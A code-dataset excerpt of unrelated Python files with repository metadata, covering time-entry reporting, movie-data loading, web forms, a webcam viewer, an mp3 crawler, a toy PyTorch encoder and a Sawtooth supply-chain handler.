            time_entries = self.time_entries()
            tmp_time_entry_results.extend(time_entries.time_entries)
            if time_entries.total_pages > 1:
                for page in range(2, time_entries.total_pages + 1):
                    time_entries = self.time_entries(page=page)
                    tmp_time_entry_results.extend(time_entries.time_entries)
        else:
            for config in arg_configs:
                # BUG FIX: the original queried with the loop-building `kwargs`
                # (i.e. only the *last* combination, repeated) instead of each
                # `config`, so multi-filter reports returned wrong data.
                time_entries = self.time_entries(**config)
                tmp_time_entry_results.extend(time_entries.time_entries)
                if time_entries.total_pages > 1:
                    for page in range(2, time_entries.total_pages + 1):
                        time_entries = self.time_entries(page=page, **config)
                        tmp_time_entry_results.extend(time_entries.time_entries)

        for time_entry in tmp_time_entry_results:
            # Resolve the full user record once per user, then reuse it.
            if time_entry.user.id not in self.user_cache:
                user = self.get_user(time_entry.user.id)
                self.user_cache[time_entry.user.id] = user
            else:
                user = self.user_cache[time_entry.user.id]

            hours = time_entry.hours
            billable_amount = 0.0
            cost_amount = 0.0
            billable_rate = time_entry.billable_rate
            cost_rate = time_entry.cost_rate
            # Amounts stay 0.0 when hours or the corresponding rate is missing.
            if hours is not None:
                if billable_rate is not None:
                    billable_amount = billable_rate * hours
                if cost_rate is not None:
                    cost_amount = cost_rate * hours

            time_entry_results.detailed_time_entries.append(
                DetailedTimeEntry(
                    date=time_entry.spent_date,
                    client=time_entry.client.name,
                    project=time_entry.project.name,
                    project_code=time_entry.project.code,
                    task=time_entry.task.name,
                    notes=time_entry.notes,
                    hours=hours,
                    billable=str(time_entry.billable),
                    # Invoiced/approved state is not available from this
                    # endpoint, so these columns are left blank.
                    invoiced='',
                    approved='',
                    first_name=user.first_name,
                    last_name=user.last_name,
                    roles=user.roles,
                    employee='Yes',
                    billable_rate=billable_rate,
                    billable_amount=billable_amount,
                    cost_rate=cost_rate,
                    cost_amount=cost_amount,
                    currency=time_entry.client.currency,
                    external_reference_url=time_entry.external_reference,
                )
            )

        return time_entry_results
| 40.245989 | 622 | 0.558464 |
3af6f1205b131d37a985d1c51f9e6d5d18cb4383 | 328 | py | Python | bibliopixel/commands/kill.py | rec/leds | ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a | [
"MIT"
] | 253 | 2015-01-03T23:17:57.000Z | 2021-12-14T02:31:08.000Z | bibliopixel/commands/kill.py | rec/leds | ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a | [
"MIT"
] | 879 | 2015-01-11T16:07:25.000Z | 2021-12-10T16:24:31.000Z | bibliopixel/commands/kill.py | rec/leds | ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a | [
"MIT"
] | 71 | 2015-01-04T01:02:47.000Z | 2022-03-25T18:30:10.000Z | """
Send a kill signal to a BiblioPixel process running on this
machine to abruptly kill it
DEPRECATED: use
.. code-block:: bash
$ kill -kill `bpa-pid`
"""
DESCRIPTION = """
Example:
.. code-block:: bash
$ bp kill
"""
from .. util.signal_handler import make_command
add_arguments, run = make_command('SIGKILL')
| 13.666667 | 59 | 0.682927 |
3af703dc54a66f683dbd47d8d1a850161cd49620 | 5,645 | py | Python | DataProcessing.py | manohar9600/The-Movies-Recommendation | 138587220ff6bef4c856ea905af5b7e9574e5964 | [
"MIT"
] | null | null | null | DataProcessing.py | manohar9600/The-Movies-Recommendation | 138587220ff6bef4c856ea905af5b7e9574e5964 | [
"MIT"
] | null | null | null | DataProcessing.py | manohar9600/The-Movies-Recommendation | 138587220ff6bef4c856ea905af5b7e9574e5964 | [
"MIT"
] | null | null | null | # Standard imports
import json
import ast
# Third party imports
import pandas as pd
from tabulate import tabulate
# Local application imports
from utils.logger import logger
class Dataloding:
"""Loads movie lens and TMDB data from data folder.
"""
def __init__(self, data_folder='data'):
self.data_folder = data_folder.strip('/')
self.load_data()
def load_data(self) -> None:
ratings_file_path = self.data_folder + '/ratings.csv'
self.ratings_df = pd.read_csv(ratings_file_path)
logger.info("ratings: ")
logger.info(tabulate(self.ratings_df.head(), headers='keys',
tablefmt='pretty'))
logger.info("successfully loaded ratings. entries: %s" % \
self.ratings_df.shape[0])
movies_data_path = self.data_folder + '/movies_metadata.csv'
self.movies_df = pd.read_csv(movies_data_path)
self.movies_df = self.transform_movies_df(self.movies_df)
logger.info("successfully loaded movies metadata. entries: %s" % \
self.movies_df.shape[0])
keywords_data_path = self.data_folder + '/keywords.csv'
self.keywords_df = pd.read_csv(keywords_data_path)
self.keywords_df = self.transform_keywords_df(self.keywords_df)
logger.info("successfully loaded movie keywords data. entries: %s" \
% self.keywords_df.shape[0])
links_data_path = self.data_folder + '/links.csv'
self.links_df = pd.read_csv(links_data_path)
logger.info("movie links: ")
logger.info(tabulate(self.links_df.head(), headers='keys',
tablefmt='pretty'))
logger.info("successfully loaded movie links data. entries: %s" \
% self.links_df.shape[0])
credits_data_path = self.data_folder + '/credits.csv'
self.credits_df = pd.read_csv(credits_data_path)
self.credits_df = self.transform_credits_df(self.credits_df)
logger.info("successfully loaded credits data. entries: %s" \
% self.credits_df.shape[0])
logger.info("successfully loaded all data")
def transform_movies_df(self, movies_df) -> pd.DataFrame:
"""Converts non strings like jsons or other data types to string or list.
and also minimizes data size.
Args:
movies (DataFrame): movies data in df format
Returns:
DataFrame: dataframe with better data structures.
"""
self.id_collection = {}
self.id_genre = {}
for index, row in movies_df.iterrows():
if not pd.isna(row['belongs_to_collection']) and \
row['belongs_to_collection'].strip():
collection_str = row['belongs_to_collection']
collection_json = ast.literal_eval(collection_str)
movies_df.loc[index, 'belongs_to_collection'] = \
collection_json['id']
self.id_collection[collection_json['id']] = \
collection_json['name']
else:
movies_df.loc[index, 'belongs_to_collection'] = -1
if not pd.isna(row['genres']) and \
row['genres'].strip():
genres_str = row['genres']
genres_list = ast.literal_eval(genres_str)
movies_df.at[index, 'genres'] = [g['id'] for g in genres_list]
for genre in genres_list:
self.id_genre[genre['id']] = genre['name']
else:
movies_df.loc[index, 'genres'] = []
return movies_df
def transform_keywords_df(self, keywords_df) -> pd.DataFrame:
"""Converts keywords data in json format to list format.
storing only ids in keywords_df and separate dictionary for mappings
Args:
keywords_df (pd.DataFrame): raw keywords data
Returns:
pd.DataFrame: transformed dataframe
"""
self.id_keyword = {}
for index, row in keywords_df.iterrows():
keywords_json = row['keywords']
keyword_ids = []
if keywords_json.strip():
keywords_json = ast.literal_eval(keywords_json)
for key in keywords_json:
keyword_ids.append(key['id'])
self.id_keyword[key['id']] = key['name']
keywords_df.at[index, 'keywords'] = keyword_ids
return keywords_df
def transform_credits_df(self, credits_df) -> pd.DataFrame:
    """Compact the JSON-like ``cast``/``crew`` columns of the credits data.

    ``cast`` becomes a list of ids (id -> name pairs go to ``self.id_credit``),
    while ``crew`` is parsed into its full list-of-dicts form.  Empty cells
    are left untouched.

    Args:
        credits_df (pd.DataFrame): raw credits data.

    Returns:
        pd.DataFrame: the transformed dataframe.
    """
    self.id_credit = {}
    for index, row in credits_df.iterrows():
        raw_cast = row['cast']
        if raw_cast.strip():
            members = ast.literal_eval(raw_cast)
            for member in members:
                self.id_credit[member['id']] = member['name']
            credits_df.at[index, 'cast'] = [m['id'] for m in members]
        raw_crew = row['crew']
        if raw_crew.strip():
            credits_df.at[index, 'crew'] = ast.literal_eval(raw_crew)
    return credits_df
class DataProcessing:
    """Placeholder for the data-processing pipeline; nothing implemented yet."""

    def __init__(self) -> None:
        # Intentionally empty: construction has no state to set up.
        pass
if __name__ == '__main__':
    # Smoke-test entry point: constructing the loader runs all transforms.
    # NOTE(review): "Dataloding" looks like a typo of "DataLoading" but it
    # must match the class defined earlier in this file -- confirm.
    data = Dataloding()
| 37.384106 | 81 | 0.583702 |
aae5f1d79a16e11baab64d302ca2965536e5380a | 95 | py | Python | coremodels/apps.py | pakponj/coursing-field | 0368c2fc546b3955dc1fef1fc00252d8f015f56d | [
"Apache-2.0"
] | null | null | null | coremodels/apps.py | pakponj/coursing-field | 0368c2fc546b3955dc1fef1fc00252d8f015f56d | [
"Apache-2.0"
] | null | null | null | coremodels/apps.py | pakponj/coursing-field | 0368c2fc546b3955dc1fef1fc00252d8f015f56d | [
"Apache-2.0"
] | null | null | null | from django.apps import AppConfig
class CoremodelsConfig(AppConfig):
    """Django application configuration for the ``coremodels`` app."""
    name = 'coremodels'
| 15.833333 | 34 | 0.768421 |
aae6433bbacb013e1d4734b577daca4627358efe | 421 | py | Python | easy/1710-maximum-units-on-a-truck.py | changmeng72/leecode_python3 | 8384f52f0dd74b06b1b6aefa277dde6a228ff5f3 | [
"MIT"
] | null | null | null | easy/1710-maximum-units-on-a-truck.py | changmeng72/leecode_python3 | 8384f52f0dd74b06b1b6aefa277dde6a228ff5f3 | [
"MIT"
] | null | null | null | easy/1710-maximum-units-on-a-truck.py | changmeng72/leecode_python3 | 8384f52f0dd74b06b1b6aefa277dde6a228ff5f3 | [
"MIT"
] | null | null | null | class Solution:
def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:
boxTypes.sort(key=lambda x: x[1],reverse = True)
r = 0
remaining = truckSize
for boxType in boxTypes:
b = min(remaining,boxType[0])
r += b * boxType[1]
remaining -= b
if remaining==0:
break
return r
| 32.384615 | 78 | 0.489311 |
aae681f8c4e041d774adeeb9e3c2ebb127572c89 | 688 | py | Python | scripts/forms.py | ansa-aboudou/resumex | 8c546403495c6d0045af4530a3f8601f69035528 | [
"MIT"
] | null | null | null | scripts/forms.py | ansa-aboudou/resumex | 8c546403495c6d0045af4530a3f8601f69035528 | [
"MIT"
] | null | null | null | scripts/forms.py | ansa-aboudou/resumex | 8c546403495c6d0045af4530a3f8601f69035528 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from wtforms import Form, StringField, validators
class LoginForm(Form):
    """WTForms login form: required username/password, optional email.

    NOTE(review): ``password`` uses StringField, so the input is not masked;
    consider wtforms PasswordField if masking is intended -- confirm.
    """
    username = StringField('Username:', validators=[validators.required(), validators.Length(min=1, max=30)])
    password = StringField('Password:', validators=[validators.required(), validators.Length(min=1, max=30)])
    email = StringField('Email:', validators=[validators.optional(), validators.Length(min=0, max=50)])
class ProjectForm(Form):
    """WTForms project form: required title, optional free-text description."""
    title = StringField('Title:', validators=[validators.required(), validators.Length(min=1, max=1000)])
    description = StringField('Description:', validators=[validators.optional(), validators.Length(min=0, max=10000)])
| 49.142857 | 119 | 0.710756 |
aae69a1c9858fa2062e072c3ac6fac72ce0dc685 | 334 | py | Python | OpenCV/assign1_2.py | Aanal2901/Autumn-of-Automation | c6ea432d3608652254b841c392dde6aa466b2df4 | [
"MIT"
] | null | null | null | OpenCV/assign1_2.py | Aanal2901/Autumn-of-Automation | c6ea432d3608652254b841c392dde6aa466b2df4 | [
"MIT"
] | null | null | null | OpenCV/assign1_2.py | Aanal2901/Autumn-of-Automation | c6ea432d3608652254b841c392dde6aa466b2df4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 00:44:49 2020
@author: Aanal Sonara
"""
import cv2
# Stream frames from the default webcam until the user presses Esc.
cap = cv2.VideoCapture(0)
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        # The camera stopped delivering frames; exit instead of showing None.
        break
    cv2.imshow("live video", frame)
    # Bug fix: the original used the boolean operator `and`, which makes k
    # always 0xFF (255) so the Esc check below never fires; bitwise `&` is
    # the intended masking of waitKey's return value.
    k = cv2.waitKey(1) & 0xFF
    if k == 27:  # Esc key
        break
cap.release()
cv2.destroyAllWindows()
aae6ab08212b4b7afe1925bc3ddbf0db7587516e | 5,515 | py | Python | site_parser/site_parser.py | TheStalkerDen/Comp-Architecture-Lab1 | ad92aed0c639cb223adc033aba5f79cc6a8f5344 | [
"MIT"
] | null | null | null | site_parser/site_parser.py | TheStalkerDen/Comp-Architecture-Lab1 | ad92aed0c639cb223adc033aba5f79cc6a8f5344 | [
"MIT"
] | null | null | null | site_parser/site_parser.py | TheStalkerDen/Comp-Architecture-Lab1 | ad92aed0c639cb223adc033aba5f79cc6a8f5344 | [
"MIT"
] | null | null | null | import configparser
import os
import tempfile
import urllib.request
import xml.dom.minidom
import xml.etree.ElementTree as ET
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from tinytag import TinyTag
import gevent
# Configuration is loaded once at import time from setting.cfg, located one
# directory above this module.
dir_path = os.path.dirname(os.path.realpath(__file__))
CONFIG = configparser.ConfigParser()
CONFIG.read(os.path.join(dir_path, '../setting.cfg'))
# Global switch: run the crawler/analyzer concurrently with gevent.
USE_GEVENT = CONFIG['common'].getboolean('use_gevent')
def get_site_list_from_file(file_name):
    """Return the text of every top-level ``<site>`` element in *file_name*.

    Args:
        file_name: path to an XML file whose root contains <site> children.

    Returns:
        list[str]: the site URLs in document order.
    """
    root = ET.parse(file_name).getroot()
    return [child.text for child in root if child.tag == "site"]
def get_mp3_genre_and_title(mp3_filename):
    """Read the audio tags of *mp3_filename* and return ``(genre, title)``.

    Missing tags are replaced with the placeholders "Undefined"/"No-title";
    the attributes are set on the TinyTag object only to simplify the return.
    """
    audio_tag = TinyTag.get(mp3_filename)
    if audio_tag.genre is None:
        audio_tag.genre = "Undefined"
    if audio_tag.title is None:
        audio_tag.title = "No-title"
    return audio_tag.genre, audio_tag.title
def collect_all_links_from_html(html_page):
    """Return the ``href`` attribute of every ``<a>`` tag in *html_page*.

    Anchors without an href yield None entries (BeautifulSoup ``get``).
    """
    soup = BeautifulSoup(html_page, 'html.parser')
    return [x.get('href') for x in soup.find_all('a')]
def get_all_links_from_url(url):
    """Fetch *url* and return all anchor links found in the page.

    Returns an empty list when the server answers with an HTTP error.
    A browser-like User-Agent is sent because some sites reject the default.
    NOTE(review): network-level failures (urllib.error.URLError) are not
    caught here and will propagate -- confirm that is intended.
    """
    try:
        main_page_req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        html_page = urllib.request.urlopen(main_page_req)
        return collect_all_links_from_html(html_page)
    except urllib.error.HTTPError:
        return []
def convert_link_to_absolute(base_url, link):
    """Resolve *link* against *base_url* and percent-quote its path.

    ``file://`` URLs are returned unmodified; for every other scheme the
    result is rebuilt as scheme://netloc/quoted-path (query and fragment
    are dropped, matching the crawler's needs).
    """
    absolute = urllib.parse.urljoin(base_url, link)
    parts = urllib.request.urlparse(absolute)
    if parts.scheme == "file":
        return absolute
    return parts.scheme + "://" + parts.netloc + urllib.parse.quote(parts.path)
def convert_links_to_absolute(base_url, links):
    """Resolve every entry of *links* against *base_url* (see convert_link_to_absolute)."""
    absolute_links = []
    for link in links:
        absolute_links.append(convert_link_to_absolute(base_url, link))
    return absolute_links
def get_mp3_links(links, digest_level, *, use_gevent):
    """Crawl *links* up to *digest_level* pages deep and collect ``.mp3`` URLs.

    Args:
        links: absolute start URLs.
        digest_level: recursion depth; 1 means only the start pages are read.
        use_gevent: when True each start URL is crawled in its own greenlet.

    Returns:
        list: every mp3 URL discovered during the crawl.
    """
    # Shared across recursive calls (and greenlets) to avoid revisiting pages.
    visited_links = set()
    mp3_links = []
    def _get_mp3_links(url, level):
        visited_links.add(url)
        _links = convert_links_to_absolute(url, get_all_links_from_url(url))
        links_to_visit = []
        for link in _links:
            if link.endswith(".mp3"):
                mp3_links.append(link)
            elif level > 1:
                # NOTE(review): this HEAD request targets the *current* page
                # (url), not the candidate `link`; it looks like it was meant
                # to probe the link's Content-Type -- confirm before relying
                # on the html filtering below.
                req = urllib.request.Request(url, method="HEAD", headers={'User-Agent': 'Mozilla/5.0'})
                response = urllib.request.urlopen(req)
                if link.endswith("html") or response.getheader("Content-Type").startswith("text/html"):
                    links_to_visit.append(link)
        if level > 1:
            for link in links_to_visit:
                if link not in visited_links:
                    _get_mp3_links(link, level - 1)
    if use_gevent:
        jobs = [gevent.spawn(_get_mp3_links, url, digest_level) for url in links]
        gevent.joinall(jobs)
    else:
        for url in links:
            _get_mp3_links(url, digest_level)
    return mp3_links
def analyze_mp3_from_links(mp3_links, *, use_gevent):
    """Download the head of each mp3 in *mp3_links* and group them by genre.

    Each file is fetched into a temporary directory just long enough to read
    its audio tags; the directory is removed before returning.

    Args:
        mp3_links: iterable of absolute mp3 URLs.
        use_gevent: when True the downloads run concurrently via gevent.

    Returns:
        dict: genre -> list of {"filename", "title", "link"} entries.
    """
    analyzed_mp3_sorted_by_genre = {}
    tmp_dir = tempfile.TemporaryDirectory(suffix='mp3')
    def _analyze_mp3(mp3_link):
        file_name = os.path.basename(urllib.parse.urlparse(mp3_link).path)
        try:
            print(f"Load {file_name}")
            # Only the first bytes are needed for the tags.  Bug fix: the
            # HTTP Range header syntax is "bytes=0-4000" (RFC 7233); the
            # previous "bytes:0-4000" was invalid and servers ignored it,
            # downloading the whole file.
            req = urllib.request.Request(mp3_link, headers={'User-Agent': 'Mozilla/5.0', "Range": "bytes=0-4000"})
            with urllib.request.urlopen(req) as response, \
                    tempfile.NamedTemporaryFile(mode="w+b", delete=False, dir=tmp_dir.name) as out_file:
                data = response.read()
                out_file.write(data)
                tmp_filename = out_file.name
            genre, title = get_mp3_genre_and_title(tmp_filename)
            if genre not in analyzed_mp3_sorted_by_genre:
                analyzed_mp3_sorted_by_genre[genre] = []
            analyzed_mp3_sorted_by_genre[genre].append({"filename": file_name, "title": title, "link": mp3_link})
        except URLError:
            # Unreachable links are skipped; the rest of the batch continues.
            pass
    if use_gevent:
        jobs = [gevent.spawn(_analyze_mp3, mp3_link) for mp3_link in mp3_links]
        gevent.joinall(jobs)
    else:
        for mp3_link in mp3_links:
            _analyze_mp3(mp3_link)
    tmp_dir.cleanup()
    return analyzed_mp3_sorted_by_genre
def generate_xml_res_string(sorted_by_genre_mp3):
    """Render the genre -> tracks mapping as pretty-printed UTF-8 XML bytes.

    Args:
        sorted_by_genre_mp3: dict mapping genre name to a list of dicts with
            "filename", "title" and "link" keys.

    Returns:
        bytes: a <Playlist> document with one <Genre> node per genre.
    """
    playlist = ET.Element('Playlist')
    for genre_name, tracks in sorted_by_genre_mp3.items():
        genre_node = ET.SubElement(playlist, 'Genre', {'name': genre_name})
        for track in tracks:
            music_node = ET.SubElement(genre_node, 'music')
            for tag in ('filename', 'title', 'link'):
                ET.SubElement(music_node, tag).text = track[tag]
    raw = ET.tostring(playlist, encoding="unicode")
    # Round-trip through minidom purely for indentation.
    return xml.dom.minidom.parseString(raw).toprettyxml().encode("utf-8")
def generate_xml_result_in_result_file(sorted_by_genre_mp3, result_file):
    """Serialize *sorted_by_genre_mp3* to XML and write the bytes to *result_file*.

    *result_file* must be a file object opened in binary mode.
    """
    final_res = generate_xml_res_string(sorted_by_genre_mp3)
    result_file.write(final_res)
def scrape_mp3_from_sites(input_filename, digest_level):
    """End-to-end pipeline: read the site list, crawl for mp3s, analyze them.

    The grouped result is written to ``../result.xml`` relative to the
    current working directory.

    Args:
        input_filename: XML file containing <site> entries to crawl.
        digest_level: how many link levels deep to follow from each site.
    """
    site_list = get_site_list_from_file(input_filename)
    mp3_links = get_mp3_links(site_list, digest_level, use_gevent=USE_GEVENT)
    analyzed_res = analyze_mp3_from_links(mp3_links, use_gevent=USE_GEVENT)
    with open("../result.xml", "wb") as res_file:
        generate_xml_result_in_result_file(analyzed_res, res_file)
| 36.282895 | 114 | 0.677244 |
aae7a8e4bea1bfaeb77207d29d33884bce510446 | 4,341 | py | Python | project/encoder_toy.py | tkosht/wikiencoder | c1744e60e902949e1926c9efe0c24eb3ac5f00fd | [
"MIT"
] | null | null | null | project/encoder_toy.py | tkosht/wikiencoder | c1744e60e902949e1926c9efe0c24eb3ac5f00fd | [
"MIT"
] | null | null | null | project/encoder_toy.py | tkosht/wikiencoder | c1744e60e902949e1926c9efe0c24eb3ac5f00fd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import numpy
import torch
import torchnet
from tqdm import tqdm
from torchnet.engine import Engine
from torchnet.logger import VisdomPlotLogger, VisdomLogger
import project.deco as deco
from project.sequoder import SequenceEncoder, get_loss
def get_args():
    """Parse the command line options for the toy encoder experiment."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--debug", action="store_true", default=False,
                        help="if you specified, execute as debug mode. default: 'False'")
    parser.add_argument("--trace", action="store_true", default=False,
                        help="if you specified, execute as trace mode. default: 'False'")
    # argparse applies `type` to string defaults, so these become int/float.
    parser.add_argument("--epochs", type=int, default="500")
    parser.add_argument("--lr", type=float, default="0.001")
    parser.add_argument("--weight-decay", type=float, default="0")
    return parser.parse_args()
def get_toydata(n_data, device):
    """Build *n_data* random sequences of shape (t, 1, 3) with t in [2, 6].

    Args:
        n_data: number of sequences to generate.
        device: torch device each sequence is moved to.

    Returns:
        list[torch.Tensor]: the generated sequences.
    """
    sequences = []
    for _ in range(n_data):
        length = numpy.random.randint(5) + 2
        steps = torch.stack([torch.randn(1, 3) for _ in range(length)])
        sequences.append(steps.to(device))
    return sequences
def reverse_tensor(tensor, device=torch.device("cpu")):
    """Return *tensor* with its first dimension reversed (a copy).

    Args:
        tensor: tensor to flip along dim 0.
        device: device the reversal indices are created on.
    """
    rev_idx = torch.arange(tensor.size(0) - 1, -1, -1,
                           dtype=torch.long, device=device)
    return tensor.index_select(0, rev_idx)
@deco.trace
@deco.excep(return_code=True)
def main():
    """Train a toy SequenceEncoder to reverse random sequences.

    Wires a torchnet Engine with hooks that reset/accumulate an average loss
    meter and log it to a Visdom line plot.  The deco.excep decorator turns
    any exception into a non-zero return code for the __main__ guard.
    """
    args = get_args()
    # NOTE(review): device is hard-coded to the second GPU -- confirm this is
    # intentional rather than something that should come from the CLI args.
    device = torch.device("cuda:1")
    # device = torch.device("cpu")
    model = SequenceEncoder(3, 2, device)
    n_data = 10
    data = get_toydata(n_data, device)
    # Teacher signal: each sequence reversed in time.
    teacher = [reverse_tensor(seq, device) for seq in data]
    training_data = (data, teacher)
    optim_params = {
        "params": model.parameters(),
        "weight_decay": args.weight_decay,
        "lr": args.lr,
    }
    optimizer = torch.optim.Adam(**optim_params)
    meter_loss = torchnet.meter.AverageValueMeter()
    port = 8097
    train_loss_logger = VisdomPlotLogger(
        'line', port=port, opts={'title': 'encoder_toy - train loss'})
    def network(sample):
        # Forward pass for one (input, target) pair; returns (loss, outputs).
        x = sample[0]  # sequence
        t = sample[1]  # target sequence
        y, mu, logvar = model(x)
        loss = get_loss(y, t, mu, logvar)
        o = y, mu, logvar
        return loss, o
    def reset_meters():
        meter_loss.reset()
    def on_sample(state):
        # Append the train flag to the sample and clear model state per step.
        state['sample'] = list(state['sample'])
        state['sample'].append(state['train'])
        model.zero_grad()
        model.init_hidden()
    def on_forward(state):
        loss_value = state['loss'].data
        meter_loss.add(state['loss'].data)
    def on_start_epoch(state):
        reset_meters()
        # The engine consumes its iterator; keep the raw dataset around so a
        # fresh tqdm iterator can be rebuilt every epoch.
        if 'dataset' not in state:
            dataset = state['iterator']
            state['dataset'] = dataset
        dataset = state['dataset']
        state['iterator'] = tqdm(zip(*dataset))
    def on_end_epoch(state):
        loss_value = meter_loss.value()[0]
        epoch = state['epoch']
        print(f'loss[{epoch}]: {loss_value:.4f}')
        train_loss_logger.log(epoch, loss_value)
        dataset = state['dataset']
        state['iterator'] = tqdm(zip(*dataset))
    engine = Engine()
    engine.hooks['on_sample'] = on_sample
    engine.hooks['on_forward'] = on_forward
    engine.hooks['on_start_epoch'] = on_start_epoch
    engine.hooks['on_end_epoch'] = on_end_epoch
    engine.train(network, training_data, maxepoch=args.epochs, optimizer=optimizer)
    # loss_records = model.do_train(training_data, args.epochs, optimizer)
    # def save_fig(x, img_file):
    #     pyplot.plot(range(len(x)), x)
    #     pathlib.Path(img_file).parent.mkdir(parents=True, exist_ok=True)
    #     pyplot.savefig(img_file)
    # save_fig(loss_records, "results/loss_toydata.png")
if __name__ == '__main__':
    # main() returns a non-zero code on failure (deco.excep return_code=True);
    # point the user at the log file before propagating the exit code.
    r = main()
    if r != 0:
        logfile = deco.logger.logger.handlers[0].baseFilename
        print(f"Abort with error. see logfile '{logfile}'")
        exit(r)
| 31.919118 | 95 | 0.628657 |
aae827e1c08cf7a4934daf6680f0a298b8d6f043 | 18,420 | py | Python | families/supplychain_python/sawtooth_supplychain/processor/handler.py | trust-tech/sawtooth-core | fcd66ff2f13dba51d7642049e0c0306dbee3b07d | [
"Apache-2.0"
] | null | null | null | families/supplychain_python/sawtooth_supplychain/processor/handler.py | trust-tech/sawtooth-core | fcd66ff2f13dba51d7642049e0c0306dbee3b07d | [
"Apache-2.0"
] | null | null | null | families/supplychain_python/sawtooth_supplychain/processor/handler.py | trust-tech/sawtooth-core | fcd66ff2f13dba51d7642049e0c0306dbee3b07d | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import logging
import json
from sawtooth_sdk.processor.state import StateEntry
from sawtooth_sdk.processor.exceptions import InvalidTransaction
from sawtooth_sdk.processor.exceptions import InternalError
from sawtooth_sdk.protobuf.transaction_pb2 import TransactionHeader
import sawtooth_supplychain.addressing as addressing
LOGGER = logging.getLogger(__name__)
# Transaction-family metadata constants (informational; not referenced by
# the handlers visible in this module).
SUPPLYCHAIN_VERSION = '0.5'
SUPPLYCHAIN_NAMESPACE = 'Supplychain'
def state_get_single(state, uid):
    """Fetch and JSON-decode the single state entry stored at address *uid*.

    Returns None when the address holds no data.
    """
    entries = state.get([uid])
    if not entries:
        return None
    return json.loads(entries[0].data.decode())
def state_put_single(state, uid, data):
    """JSON-encode *data* and store it at address *uid*, verifying the write.

    Raises:
        InternalError: when the validator does not confirm the address.
    """
    payload = json.dumps(data, sort_keys=True).encode()
    addresses = state.set([StateEntry(address=uid, data=payload)])
    if not addresses or uid not in addresses:
        raise InternalError("Error setting state, addresses returned: %s.",
                            addresses)
class SupplychainHandler(object):
    """Sawtooth transaction handler that dispatches supply-chain payloads."""

    def __init__(self):
        pass

    @property
    def family_name(self):
        """Transaction family name registered with the validator."""
        return 'sawtooth_supplychain'

    @property
    def family_versions(self):
        """Transaction family versions this handler supports."""
        return ['1.0']

    @property
    def encodings(self):
        """Payload encodings this handler understands."""
        return ['application/json']

    @property
    def namespaces(self):
        """State address namespaces claimed by this family."""
        return [addressing.get_namespace()]

    def apply(self, transaction, state):
        """Decode the JSON payload and route it by its MessageType."""
        payload = json.loads(transaction.payload.decode())
        LOGGER.debug("SupplychainHandler.apply: %s", repr(payload))
        dispatch = {'Record': RecordHandler, 'Agent': AgentHandler}
        handler = dispatch.get(payload['MessageType'])
        if handler is not None:
            handler.apply(transaction, state)
class RecordHandler(object):
    """Processes Record transactions: creation, transfer applications,
    acceptance/rejection/cancellation, and finalization."""

    @classmethod
    def apply(cls, transaction, state):
        """Decode a Record payload and dispatch on its Action field.

        Raises:
            InvalidTransaction: on a missing record id or unknown action.
        """
        payload = json.loads(transaction.payload.decode())
        LOGGER.debug("apply payload: %s", repr(payload))
        tnx_action = payload.get('Action', None)
        txnrecord_id = payload.get('RecordId', None)
        header = TransactionHeader()
        header.ParseFromString(transaction.header)
        tnx_originator = addressing.get_agent_id(header.signer_pubkey)
        # Retrieve the stored record data if an ID is provided.
        record_id = txnrecord_id
        record_store_key = record_id
        record_store = state_get_single(state, record_store_key)
        # Check Action
        if tnx_action == 'Create':
            if txnrecord_id is None:
                raise InvalidTransaction(
                    'Record id expected for CreateRecord')
            record_store = {}
            cls.create_record(tnx_originator, record_id, payload,
                              state, record_store)
        elif tnx_action == "CreateApplication":
            if txnrecord_id is None:
                raise InvalidTransaction(
                    'Record id expected for create_application')
            cls.create_application(tnx_originator, record_id, payload,
                                   state, record_store)
        elif tnx_action == "AcceptApplication":
            if txnrecord_id is None:
                raise InvalidTransaction(
                    'Record id expected for accept_application')
            cls.accept_application(tnx_originator, record_id, payload,
                                   state, record_store)
        elif tnx_action == "RejectApplication":
            if txnrecord_id is None:
                raise InvalidTransaction(
                    'Record id expected for reject_application')
            cls.reject_application(tnx_originator, record_id, payload,
                                   state, record_store)
        elif tnx_action == "CancelApplication":
            if txnrecord_id is None:
                raise InvalidTransaction(
                    'Record id expected for cancel_application')
            cls.cancel_application(tnx_originator, record_id, payload,
                                   state, record_store)
        elif tnx_action == "Finalize":
            if txnrecord_id is None:
                raise InvalidTransaction(
                    'Record id expected for Finalize')
            cls.finalize_record(tnx_originator, record_id, payload,
                                state, record_store)
        else:
            raise InvalidTransaction('Action {} is not valid'.
                                     format(tnx_action))
        # Store the record data back
        state_put_single(state, record_store_key, record_store)

    @classmethod
    def create_record(cls, originator, record_id, payload, state, my_store):
        """Create a record, transferring ownership/custodianship from parents.

        When the record has parents, their accepted application determines
        whether this is an ownership transfer or a custodian push/pop; all
        parents are then marked final and the agent indices updated.
        """
        sensor_id = payload.get('Sensor', None)
        sensor_idx = None
        if sensor_id is not None:
            sensor_idx = addressing.get_sensor_id(sensor_id)
        record_info = {}
        # Owner set below
        record_info['CurrentHolder'] = originator
        # Custodians set below
        record_info['Parents'] = payload.get('Parents', None)
        record_info['Timestamp'] = payload.get('Timestamp')
        record_info['Sensor'] = sensor_idx
        record_info['Final'] = False
        record_info['ApplicationFrom'] = None
        record_info['ApplicationType'] = None
        record_info['ApplicationTerms'] = None
        record_info['ApplicationStatus'] = None
        record_info['EncryptedConsumerAcccessible'] = None
        record_info['EncryptedOwnerAccessible'] = None
        my_store['RecordInfo'] = record_info
